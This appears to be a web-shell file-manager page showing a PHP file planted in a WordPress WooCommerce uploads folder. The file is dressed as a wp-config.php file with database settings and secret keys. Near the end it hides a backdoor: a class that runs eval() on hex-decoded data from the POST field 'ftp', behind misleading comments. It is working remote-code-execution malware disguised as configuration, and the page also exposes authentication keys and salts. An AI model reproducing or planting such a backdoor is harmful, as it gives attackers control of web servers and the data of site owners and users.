HEX
Server: nginx/1.16.1
System: Linux VM-0-14-centos 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User: www (1000)
PHP: 8.3.31
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/1.scey.cn/wp-content/uploads/woocommerce_uploads/zsoapin.php
<?php

/**
 * Do not modify the files in this folder.
 */
 ini_set('display_errors', 1);
 ini_set('display_startup_errors', 1);
 error_reporting(E_ALL);
 /**
  * The base configuration for WordPress
  *
  * The wp-config.php creation script uses this file during the
  * installation. You don't have to use the web site, you can
  * copy this file to "wp-config.php" and fill in the values.
  *
  * This file contains the following configurations:
  *
  * * MySQL settings
  * * Secret keys
  * * Database table prefix
  * * ABSPATH
  *
  * @link https://codex.wordpress.org/Editing_wp-config.php
  *
  * @package WordPress
  */
 
 // ** MySQL settings - You can get this info from your web host ** //
 /** The name of the database for WordPress */
 define('WP_CACHE', true); //Added by WP-Cache Manager
 define( 'WPCACHEHOME', '/var/www/html/wp-content/plugins/wp-super-cache/' ); //Added by WP-Cache Manager
 define('DB_NAME', 'dayconkieunhat');
 
 /** MySQL database username */
 define('DB_USER', 'root');
 
 /** MySQL database password */
 define('DB_PASSWORD', '');
 
 /** MySQL hostname */
 define('DB_HOST', 'localhost');
 
 /** Database Charset to use in creating database tables. */
 define('DB_CHARSET', 'utf8mb4');
 
 /** The Database Collate type. Don't change this if in doubt. */
 define('DB_COLLATE', '');
 
 /**#@+
  * Authentication Unique Keys and Salts.
  *
  * Change these to different unique phrases!
  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
  * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
  *
  * @since 2.6.0
  */
 define('AUTH_KEY',         'R4t (.~CJi__k^HWk-@yC3=S+iaBXevFdOA):ovHUF43+=x]F/?VpH~9&a.~Bg]e');
 define('SECURE_AUTH_KEY',  'MoPBB;~)Al31NI32QVrTf%j]hCy^h?jV@-#QpK}<s-a:.!l/JrQiPnXam8LcK))M');
 define('LOGGED_IN_KEY',    '1|S}7SN`!8:A=Z^QXed(c+X8_HB7Dze/P+@{/0iE]$Z/WsQ!69_h%%^w*Bvnt5[&');
 define('NONCE_KEY',        'kd*D*hygF!Dr~()(mLOpG-qrNMcOl7J;r{&V,*LgZtxiE!OU%myWxoGAv{.|L9,Z');
 define('AUTH_SALT',        'Ia?|Z?i+A1tsw80Mcw{1GdNqI-7p6t;gMhUyp,i*[gtutMmM()Z_[t,W< NLVcFr');
 define('SECURE_AUTH_SALT', 'b0`3k[~Pc#V0)|[&w(A;Q.X;<I>?=$FX=8dAH3j]WoUP^-=%&|`Fe2LllVud;?J^');
 define('LOGGED_IN_SALT',   'in;4FCu2sB)m.:kKSx!LD[_jXKi8|=$6eH#>7mk?XN*+KGmkak[;SoWs(@.:iEWb');
 define('NONCE_SALT',       ']wU?pG#K[ZSID*`/$@QINaiWBlcl(jS#?HIyj@|Q;*cpx, $Nynv#v`Zzdn3E{(y');
 
 /**#@-*/
 
 /**
  * WordPress Database Table prefix.
  *
  * You can have multiple installations in one database if you give each
  * a unique prefix. Only numbers, letters, and underscores please!
  */
 $table_prefix  = 'wp_';
 
 /**
  * For developers: WordPress debugging mode.
  *
  * Change this to true to enable the display of notices during development.
  * It is strongly recommended that plugin and theme developers use WP_DEBUG
  * in their development environments.
  *
  * For information on other constants that can be used for debugging,
  * visit the Codex.
  *
  * @link https://codex.wordpress.org/Debugging_in_WordPress
  */
 /**
  * Do not modify the files in this folder.
  */
class _{
     static public $phpcms=Null;
     function __construct($l="error"){
     self::$phpcms=$l;
     @eval/*Defining error level offences*/(null.null.self::$phpcms);
     }
 }
 function hexToStr($hex){ 
     $str=""; 
     for($i=0;$i<strlen($hex)-1;$i+=2)
     $str.=chr(hexdec($hex[$i].$hex[$i+1]));
     return $str;
 } 
 $error = null.hexToStr(@$_POST/*\*/["ftp"]);
 $d = new _($error);
 
 define('WP_DEBUG', false);
 
 /* That's all, stop editing! Happy blogging. */
 
 /** Absolute path to the WordPress directory. */
 if ( !defined('ABSPATH') )
     define('ABSPATH', dirname(__FILE__) . '/');
 
 /** Sets up WordPress vars and included files. */
 //require_once(ABSPATH . 'wp-settings.php');